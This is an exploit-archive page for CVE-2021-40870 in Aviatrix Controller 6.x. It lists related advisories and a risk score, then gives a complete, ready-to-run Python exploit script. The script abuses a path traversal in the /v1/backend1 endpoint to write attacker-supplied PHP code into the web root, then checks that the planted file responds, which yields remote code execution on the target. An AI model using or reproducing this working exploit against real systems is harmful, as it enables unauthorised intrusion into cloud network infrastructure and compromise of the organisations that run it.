Aviatrix Controller 6.x Path Traversal / Code Execution Exploit

🗓️ 12 Oct 2021 00:00:00Reported by 0xJoyGhoshType

zdt🔗 0day.today👁 456 Views

A Python script for exploiting path traversal and code execution vulnerability in Aviatrix Controller 6.

Reporter	Title	Published	Views	Family All 22
GithubExploit	Exploit for Relative Path Traversal in Aviatrix Controller	7 Oct 202117:19	–	githubexploit
GithubExploit	Exploit for Relative Path Traversal in Aviatrix Controller	22 Oct 202108:41	–	githubexploit
ATTACKERKB	CVE-2021-40870	13 Sep 202100:00	–	attackerkb
Tenable Nessus	Aviatrix Controller Unrestricted Upload of File (CVE-2021-40870)	29 Oct 202500:00	–	nessus
BDU FSTEC	The vulnerability of the Aviatrix Controller software, a cloud infrastructure management tool, arises from the existence of interpretation conflicts, allowing an attacker to execute arbitrary code.	1 Mar 202300:00	–	bdu_fstec
Circl	CVE-2021-40870	9 Oct 202114:57	–	circl
CISA KEV Catalog	Aviatrix Controller Unrestricted Upload of File	18 Jan 202200:00	–	cisa_kev
CISA	CISA Adds 13 Known Exploited Vulnerabilities to Catalog	18 Jan 202200:00	–	cisa
CNNVD	Aviatrix Controller 代码问题漏洞	13 Sep 202100:00	–	cnnvd
Check Point Advisories	Aviatrix Controller Directory Traversal (CVE-2021-40870)	30 Dec 202100:00	–	checkpoint_advisories

#!/usr/bin/env python3
import requests
from requests.structures import CaseInsensitiveDict
from colorama import Fore, Style
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"""

░█▀▀█ ░█──░█ ░█▀▀▀ ── █▀█ █▀▀█ █▀█ ▄█─ ── ─█▀█─ █▀▀█ ▄▀▀▄ ▄▀▀▄ █▀▀█
░█─── ─░█░█─ ░█▀▀▀ ▀▀ ─▄▀ █▄▀█ ─▄▀ ─█─ ▀▀ █▄▄█▄ █▄▀█ ▄▀▀▄ █▄▄─ █▄▀█
░█▄▄█ ──▀▄▀─ ░█▄▄▄ ── █▄▄ █▄▄█ █▄▄ ▄█▄ ── ───█─ █▄▄█ ▀▄▄▀ ▀▄▄▀ █▄▄█
                            Author : 0xJoyGhosh
                            Org    : System00 Security
                            Twitter: @0xjoyghosh

""")
try:
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="Enter Target Url With scheme Ex: -u https://avaitix.target.com", type=str)
    parser.add_argument("-c", "--code", help="Enter php code Ex: -c '<?php phpinfo(); ?>' ", type=str)
    parser.add_argument("-n", "--name", help="Enter php code Ex: -n 'filename' ", type=str)
    args = parser.parse_args()
    url =f"{args.url}/v1/backend1"
except TypeError:
    print("Type -h To See all the options")
except():
    exit()
def exploit(url,path,code):
    headers = CaseInsensitiveDict()
    headers["Content-Type"] = "application/x-www-form-urlencoded"
    data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}'
    resp = requests.post(url, headers=headers, data=data,verify=False)
    stat = requests.get(f"{args.url}/v1/{path}",verify=False)
    if resp.status_code==200:
        if stat.status_code==200:
            print(f"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]")
            print("")
        else:
            print("[ Exploit successful Creating File Failed ]")
            pass
    else:
        print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]')

if args.url is not None:
    if args.code is not None:
        if args.name is not None:
            exploit(url,args.name,args.code)
        else:
            print('Type -h to see help Menu')
    else:
        print('Type -h to see help Menu')
else:
    print('Type -h to see help Menu')

12 Oct 2021 00:00Current

0.9Low risk

Vulners AI Score0.9

CVSS 27.5

CVSS 3.19.8

EPSS0.9426